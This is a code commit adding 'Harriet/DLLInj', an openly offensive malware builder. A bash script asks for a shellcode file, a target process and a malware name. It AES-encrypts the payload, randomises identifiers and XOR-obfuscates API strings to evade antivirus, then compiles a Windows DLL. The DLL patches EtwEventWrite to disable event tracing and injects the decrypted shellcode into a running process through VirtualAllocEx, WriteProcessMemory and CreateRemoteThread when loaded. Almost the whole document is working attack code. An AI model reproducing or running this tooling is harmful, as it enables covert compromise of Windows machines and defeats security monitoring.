Add files via upload

Harriet/Harriet/DLLInj/DLLInj.sh

@@ -0,0 +1,146 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+______                              _____      _           _   _              ______ _      _     
+| ___ \                            |_   _|    (_)         | | (_)             |  _  \ |    | |    
+| |_/ / __ ___   ___ ___  ___ ___    | | _ __  _  ___  ___| |_ _  ___  _ __   | | | | |    | |    
+|  __/ '__/ _ \ / __/ _ \/ __/ __|   | || '_ \| |/ _ \/ __| __| |/ _ \| '_ \  | | | | |    | |    
+| |  | | | (_) | (_|  __/\__ \__ \  _| || | | | |  __/ (__| |_| | (_) | | | | | |/ /| |____| |____
+\_|  |_|  \___/ \___\___||___/___/  \___/_| |_| |\___|\___|\__|_|\___/|_| |_| |___/ \_____/\_____/
+                                             _/ |                                                 
+                                            |__/                                                  
+
+EOF
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Enter The Process To Inject To! ex: svchost.exe"${clear}
+echo ""
+read SVCHOST
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+#Copying Templates
+cp Harriet/DLLInj/xor.py Harriet/DLLInj/Resources/xor.py
+cp Harriet/DLLInj/template.cpp Harriet/DLLInj/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+#Getting AES Values
+python3 Harriet/DLLInj/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+#REPLACING VALUES
+cp shell.txt shell2.txt
+
+#AES REPLACEMENTS
+
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLInj/Resources/template.cpp
+
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLInj/Resources/template.cpp
+sleep 2
+
+#RANDOM VALUE REPLACEMENTS
+#AESDecrypt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-20} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/DLLInj/Resources/template.cpp
+#FindTarget
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-18} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/DLLInj/Resources/template.cpp
+#Inject
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/DLLInj/Resources/template.cpp
+#AES KEY
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/DLLInj/Resources/template.cpp
+#AES Payload
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/DLLInj/Resources/template.cpp
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/DLLInj/Resources/template.cpp
+#XOR FUNCTION VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/DLLInj/Resources/template.cpp
+
+#Exec VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/DLLInj/Resources/template.cpp
+
+#PROCESS NAME VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-6} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/DLLInj/Resources/template.cpp
+
+#XOR KEY VALUE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+XOR_KEY=$(cat shell.txt)
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/template.cpp
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/xor.py
+
+#XOR KEY VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+XOR_VARIABLE=$(cat shell.txt)
+sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLInj/Resources/template.cpp
+
+
+#VIRTUALALLOC - Variable Name
+cat /proc/sys/kernel/random/uuid | sed 's/[-]//g' | head -c 20 > virtualalloc.txt
+VIRT_ALLOC=$(cat "virtualalloc.txt")
+sed -i "s/Alloc_Virtual/$VIRT_ALLOC/g" Harriet/DLLInj/Resources/template.cpp
+rm virt*
+
+#VIRTUALALLOC - XOR String
+
+echo VirtualAlloc > virt.txt
+python Harriet/DLLInj/Resources/xor.py virt.txt > virtalloc.txt
+virt=$(cat virtalloc.txt)
+virt2="${virt::-8}" 
+sed -i "s/VIRALO/$virt2/g" Harriet/DLLInj/Resources/template.cpp 
+rm virt*
+
+#PROCESS STRING
+
+echo $SVCHOST > proc.txt
+python Harriet/DLLInj/Resources/xor.py proc.txt > proc2.txt
+process=$(cat proc2.txt)
+process2="${process::-8}" 
+sed -i "s/PROCY/$process2/g" Harriet/DLLInj/Resources/template.cpp 
+rm proc*
+
+
+#Compiling Malware
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLInj/Resources/template.cpp -lcomctl32 -Wl,--subsystem,windows -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}

Harriet/Harriet/DLLInj/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/Harriet/DLLInj/Resources/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "VqeaEoOtEhVmRBg"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

Harriet/Harriet/DLLInj/template.cpp

@@ -0,0 +1,177 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <tlhelp32.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
+
+char XOR_VARIABLE []= "XOR_KEY";
+
+unsigned char fRandom6 []=VIRALO}; 
+unsigned char Random9[]=PROCY};
+
+int aRandom1(char * eRandom5, unsigned int eRandom5_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, eRandom5, &eRandom5_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+int bRandom2(const char *procname) {
+
+        HANDLE hProcSnap;
+        PROCESSENTRY32 pe32;
+        int pid = 0;
+ 
+        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+                
+        pe32.dwSize = sizeof(PROCESSENTRY32); 
+                
+        if (!Process32First(hProcSnap, &pe32)) {
+                CloseHandle(hProcSnap);
+                return 0;
+        }
+                
+        while (Process32Next(hProcSnap, &pe32)) {
+                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+                        pid = pe32.th32ProcessID;
+                        break;
+                }
+        }
+                
+        CloseHandle(hProcSnap);
+                
+        return pid;
+}
+
+
+int cRandom3(HANDLE hProc, unsigned char * eRandom5, unsigned int eRandom5_len) {
+
+        LPVOID pRemoteCode = NULL;
+        HANDLE hThread = NULL;
+
+  
+        pRemoteCode = VirtualAllocEx(hProc, NULL, eRandom5_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+        WriteProcessMemory(hProc, pRemoteCode, (PVOID)eRandom5, (SIZE_T)eRandom5_len, (SIZE_T *)NULL);
+        
+        hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL);
+        if (hThread != NULL) {
+                WaitForSingleObject(hThread, 500);
+                CloseHandle(hThread);
+                return 0;
+        }
+        return -1;
+}
+
+void gRandom7(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
+        int r;
+        r = 0;
+        for (int i = 0; i < tada_len; i++) {
+                if (r == XOR_VARIABLE_len - 1) r = 0;
+
+                tada[i] = tada[i] ^ XOR_VARIABLE[r];
+                r++;
+        }
+}
+
+
+extern __declspec(dllexport) int Go(void);
+int Go(void) {
+
+	void * Random8_mem;
+	BOOL rv;
+	HANDLE th;
+    DWORD oldprotect = 0;
+    
+	int pid = 0;
+    HANDLE hProc = NULL;
+	char dRandom4 []=KEYVALUE  
+	unsigned char eRandom5[] =PAYVAL 
+ 
+	unsigned int eRandom5_len = sizeof(eRandom5);
+
+	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
+        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
+
+        #ifdef _WIN64
+        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
+        #else
+        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
+        #endif  
+
+        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
+
+	FreeConsole;
+
+	gRandom7((char *) fRandom6, sizeof (fRandom6), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), fRandom6);
+
+	
+	Random8_mem = Virt_Alloc(0, eRandom5_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+	aRandom1((char *) eRandom5, eRandom5_len, dRandom4, sizeof(dRandom4));
+	
+	RtlMoveMemory(Random8_mem, eRandom5, eRandom5_len);
+	
+	rv = VirtualProtect(Random8_mem, eRandom5_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	gRandom7((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+	
+	pid = bRandom2(Random9);
+
+	if (pid) {
+
+		hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
+						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
+						FALSE, (DWORD) pid);
+
+		if (hProc != NULL) {
+			cRandom3(hProc, eRandom5, eRandom5_len);
+			CloseHandle(hProc);
+		}
+	}
+	return 0;
+}
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
+
+	switch ( fdwReason ) {
+			case DLL_PROCESS_ATTACH:
+					Go();
+					break;
+			case DLL_THREAD_ATTACH:
+					break;
+			case DLL_THREAD_DETACH:
+					break;
+			case DLL_PROCESS_DETACH:
+					break;
+			}
+	return TRUE;
+}

Harriet/Harriet/DLLInj/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "XOR_KEY"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)